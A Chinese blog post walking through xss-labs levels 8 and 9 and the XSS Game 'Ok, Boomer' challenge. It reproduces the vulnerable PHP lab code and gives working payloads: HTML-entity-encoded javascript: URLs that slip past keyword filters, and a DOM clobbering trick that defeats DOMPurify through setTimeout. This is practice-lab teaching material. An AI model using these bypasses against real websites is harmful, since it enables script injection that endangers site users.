当前位置: 首页 > article >正文

xss-labs第八、九关卡以及XSS GAME的Ok,Boomer关卡

第八关

靶场代码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level9.php?keyword=not bad!"; 
}
</script>
<title>欢迎来到level8</title>
</head>
<body>
<h1 align=center>欢迎来到level8</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);

echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
<center><img src=level8.jpg></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>

代码分析

关键点:

  • 字符串过滤:在代码中,输入参数keyword经过一系列的str_replace操作,目的是为了替换一些危险的HTML和JavaScript关键字,如script、on、src、href等。

所以我们可以考虑一下,能不能使用HTML实体编码

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;

第九关

靶场代码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level10.php?keyword=well done!"; 
}
</script>
<title>欢迎来到level9</title>
</head>
<body>
<h1 align=center>欢迎来到level9</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php

if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
<center><img src=level9.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>

代码分析

这关于第八关,大差不差
关键点:

  • strops():查找了子字符串中是否含有http://

所以,变通一下,在alert()中,使用http://

&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;http://&#x27;&#x29;

注意:
在alert中,如果不是使用数字,则必须要添加引号,由于引号被过滤了,所以,也要进行HTML实体编码

XSS GAME的Ok,Boomer关卡解体思路

XSS GAME靶场关卡网址

代码片段

<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

代码分析

关键点:

  • DOMPurify.sanitize:这是一个DOMPurify库,是一个用于防止XSS跨站攻击的JavaScript函数,用来对HTML字符串代码“消毒”,移除恶意字符串
  • new URL(location).searchParams.get(‘boomer’):通过创建一个URL对象,解析当前页面完整的URL,从URL查询参数,获取boomer的值
  • setTimeout(ok, 2000):这是一个定时器函数,用于延迟执行某个函数,即,执行ok

通过上面的几个关键点,首先排除了常规的方式(排除所有的javascript代码),那么,现在能实现payload的地方只有setTimeout了,也就是如何才能执行ok
现在面临的问题是:ok变量不存在,因此无法执行
思考:是否能够自己定义一个ok变量,如何定义是其执行ok

方法(DOM Clobbering)

什么是DOM Clobbering?
简单来说,通过注入HTML元素,创建一个javascript变量

首先了解一下:setTimeout(functionRef,time)
既然要使用setTimeout这个函数就要了解一下,这个函数机制
setTimeout在可以处理函数,但是,在处理非函数时,调用toString()
解释:

  • JavaScript会尝试将ok转换为字符串,相当于String(ok)
  • 之后,JavaScript执行这个字符串,等于eval(Sring(ok))

而含有toString()方法的标签每个元素都有,但是大部分是HTMLElement.prototype.toString(),也就是继承父类的标签,这种标签返回的是[object HTMLXXXElement]
比如:

console.log(document.createElement("div").toString()); 
// 输出: "[object HTMLDivElement]"

console.log(document.createElement("p").toString()); 
// 输出: "[object HTMLParagraphElement]"

因此,我们要使用覆盖父类的toString()方法的标签,他可以返回href
比如:<a></a><area>

确定好使用什么标签进行payload后,就要查看DOMPurify库的白名单了,也就是如何才能不通过交互的方式进行弹窗:mailto、tel等等
最后进行payload:

https://sandbox.pwnfunction.com/warmups/ok-boomer.html/?boomer=%3Carea%20id=%27ok%27%20href=%27mailto:alert(1337)%27%3E

在这里插入图片描述

https://sandbox.pwnfunction.com/warmups/ok-boomer.html/?boomer=%3Ca%20id=%27ok%27%20href=%27mailto:alert(1337)%27%3E%3C/a%3E

在这里插入图片描述


http://www.kler.cn/a/594025.html

相关文章:

  • uniapp中的vue组件与组件使用差异
  • 如何使用webpack预加载 CSS 中定义的资源和预加载 CSS 文件
  • 微分方程求解及推导过程
  • 微软Data Formulator:用AI重塑数据可视化的未来
  • 联想拯救者触摸板会每次开机都自动关闭、联想笔记本触摸板关闭、笔记本电脑触摸板自动关闭的解决方法
  • 解锁Python print()函数高级用法
  • Linux实现交换分区和时间同步
  • 如何通过spark history页面查看gluten是否集成成功
  • PCB画图软件PROTEL99SE学习-05画出铜箔来
  • 成都高精尖生态办公:国际数字影像产业园​
  • 巧用 VSCode 开启 Vue 开发之旅
  • 力扣热题100(方便自己复习,自用)
  • 虚拟机添加多块网卡,重启时,ip绑定错误如何解决
  • 分享一个精灵图生成和拆分的实现
  • 高通 Android12 隐藏通话音量设置项
  • 【秣厉科技】LabVIEW工具包——OpenCV 教程(11):人脸检测与识别
  • 【Cocos TypeScript 零基础 22.1】
  • 云原生安全基座:零信任架构的原子化防御革命
  • 使用uniapp的vite版本进行微信小程序开发,在项目中使用mqtt连接、订阅、发布信息
  • C#入门学习记录(三)C#中的隐式和显示转换